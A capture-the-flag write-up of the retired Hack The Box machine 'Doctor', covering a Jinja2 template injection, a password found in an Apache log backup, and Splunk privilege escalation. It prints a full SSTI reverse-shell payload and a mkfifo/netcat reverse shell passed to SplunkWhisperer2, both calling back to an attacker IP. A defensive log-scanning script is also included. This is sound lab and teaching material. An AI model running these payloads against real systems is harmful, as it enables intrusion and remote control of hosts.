Hackthebox - Doctor

Summary

Doctor is an easy Linux box created by egotisticalSW. The initial foothold was finding an SSTI (server-side template injection) and using it to get a low-privilege shell. User was finding the password for a user in an apache2 backup log. Root was exploiting Splunkd.

Initial Enumeration

nmap

# Nmap 7.80 scan initiated Sun Sep 27 12:21:43 2020 as: nmap -sC -sV -oN nmap/doctor 10.10.10.209
Nmap scan report for doctors.htb (10.10.10.209)
Host is up (0.076s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-server-header:
| Apache/2.4.41 (Ubuntu)
|_ Werkzeug/1.0.1 Python/3.8.2
| http-title: Doctor Secure Messaging - Login
|_Requested resource was http://doctors.htb/login?next=%2F
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 27 12:22:31 2020 -- 1 IP address (1 host up) scanned in 48.30 seconds

WEB (IP)

Looking at the website we find an email address, info@doctors.htb, so let's add that domain and visit the site again.

WEB (doctors.htb)

We see a self-registration page, so let's register an account and check the website.

Registering redirected me to /home.

Checking "New message" shows we can create new posts.

Checking the comments in the page source we find a beta /archive route.

Trying SSTI in a post, we find a template injection with {{4*4}},

and checking the `/archive` page we find that it works (the expression is rendered there),

and checking the cookie we see that the application is probably Python.

So, trying an SSTI payload from PayloadsAllTheThings:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.24\",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

we get a shell as the web user.

Web

Enumerating the box, I saw a backup file in /var/log/apache2,

and in it we find a password, Guitar123.
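Both findings so far, a template-injection probe in user-supplied content and a password sitting in an Apache log, are catchable on the defending side. The following is an added example, not code from the box or from this writeup: it parses Apache combined-format access logs (the sample lines are constructed, not taken from the box), flags request targets carrying template-probe markers such as a percent-encoded {{4*4}}, and reports credential-looking query parameters, redacting them before the line is archived. The marker patterns and the list of secret parameter names are my own choices. Since the payload on this box went into a POST body, which access logs never record, the probe check is written as a standalone function so it can also be run over form fields at the application or WAF layer.

```python
"""Defender-side checks for the two findings above: template-injection probes
in request data, and credentials written into web-server logs.
Added example; not code from the box or from this writeup. The log lines are
constructed samples in Apache "combined" format."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlencode, urlsplit, urlunsplit

# Apache combined format: client ident user [time] "METHOD target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)

# Markers of Jinja2/Twig-style template probing: the expression and statement
# delimiters, and the Python dunder names that show up once {{4*4}} has rendered.
SSTI_PATTERNS = [
    re.compile(r"\{\{.*?\}\}", re.S),   # {{ ... }} expression (e.g. {{4*4}})
    re.compile(r"\{%.*?%\}", re.S),     # {% ... %} statement
    re.compile(r"__(class|base|mro|subclasses|builtins|import|globals)__"),
]

# Query parameters that should never travel in a URL: GET parameters are logged verbatim.
SECRET_PARAMS = {"password", "passwd", "pwd", "token", "secret", "api_key", "apikey"}

# Constructed sample log (not from the box). Line 1 carries a percent-encoded {{4*4}},
# line 3 a password in the query string, line 4 is deliberately malformed.
SAMPLE_LOG = [
    '10.10.14.24 - - [27/Sep/2020:12:30:01 +0000] "GET /search?q=%7B%7B4*4%7D%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.24 - - [27/Sep/2020:12:30:05 +0000] "GET /archive HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.10.14.25 - - [27/Sep/2020:12:31:10 +0000] "GET /reset?email=alice%40doctors.htb&password=hunter2 HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    "not a log line at all",
]


def looks_like_ssti_probe(text):
    """True if text (raw or percent-encoded) contains template-injection markers.
    Run this over form fields as well: on this box the payload went in a POST body."""
    decoded = unquote_plus(text)
    return any(p.search(decoded) or p.search(text) for p in SSTI_PATTERNS)


def secret_params_in_url(target):
    """Names of query parameters in a request target that look like credentials."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [name for name, _ in pairs if name.lower() in SECRET_PARAMS]


def redact_url(target):
    """Return target with secret-looking parameter values replaced, for safe archiving."""
    parts = urlsplit(target)
    pairs = [(name, "REDACTED" if name.lower() in SECRET_PARAMS else value)
             for name, value in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def scan_access_log(lines):
    """Return (findings, unparsed). Each finding is (client, kind, target);
    targets containing secrets are reported already redacted."""
    findings, unparsed = [], []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            unparsed.append(line)
            continue
        target = m["target"]
        if looks_like_ssti_probe(target):
            findings.append((m["client"], "ssti_probe", target))
        for name in secret_params_in_url(target):
            findings.append((m["client"], "secret_in_url:" + name, redact_url(target)))
    return findings, unparsed


if __name__ == "__main__":
    found, bad = scan_access_log(SAMPLE_LOG)
    for client, kind, target in found:
        print(f"{client} {kind} {target}")
    print(f"{len(bad)} line(s) did not parse")
```

Run against the sample, the scan reports one template probe from the first client and one password parameter from the second (shown redacted), and sets the malformed line aside rather than silently skipping it. The redaction step is the part to wire into whatever copies or backs up the log, since that backup is exactly where the password on this box was found.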

Shaun

Using su to switch to shaun with Guitar123, we get a shell.

Enumerating the box as shaun, we don't see anything interesting.

Going back to the nmap scan, we saw one more open port, 8089 (Splunkd).

Trying shaun's credentials against it, we see they work.

Googling for a Splunk exploit, we find a Metasploit module.

I tried it, but it didn't work for me.

Googling more, we find SplunkWhisperer2.

We can get a shell using SplunkWhisperer2.

Using:

python PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --lhost 10.10.14.24 --lport 9001  --payload "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 9002 >/tmp/f" --username shaun --password Guitar123

I had to fix the code a little to get it working: I changed options.lport to int(options.lport).

Root

And we have rooted the box.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/doctor/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.